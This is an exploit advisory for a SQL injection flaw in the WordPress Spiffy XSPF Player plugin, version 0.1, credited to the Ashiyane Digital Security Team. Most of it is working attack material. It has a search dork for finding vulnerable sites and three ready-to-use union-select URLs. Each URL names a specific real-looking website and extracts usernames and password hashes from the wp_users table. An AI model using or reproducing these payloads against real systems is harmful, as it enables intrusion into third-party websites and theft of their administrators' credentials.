WordPress Spiffy XSPF Player third party plugin version 0.1 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
a3597f51aeac54bbb4fee719e49631114cfa5a22f8b62d1e4785cfcd18eedb2c
##############
# Exploit Title : Wordpress Spiffy XSPF Player plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 0.1
#
# Dork : inurl:wp-content/plugins/spiffy/playlist.php?playlist_id=
#
##############
#Location:site/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL]
#
#
#DEm0:
# http://www.greatacoustics.org/wp-content/plugins/spiffy/playlist.php?playlist_id=-2+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--
#
# http://www.animaterrasings.org/wp-content/plugins/spiffy/playlist.php?playlist_id=-7+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--
#
# http://www.jaynekelly.com/wp-content/plugins/spiffy/playlist.php?playlist_id=-2+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############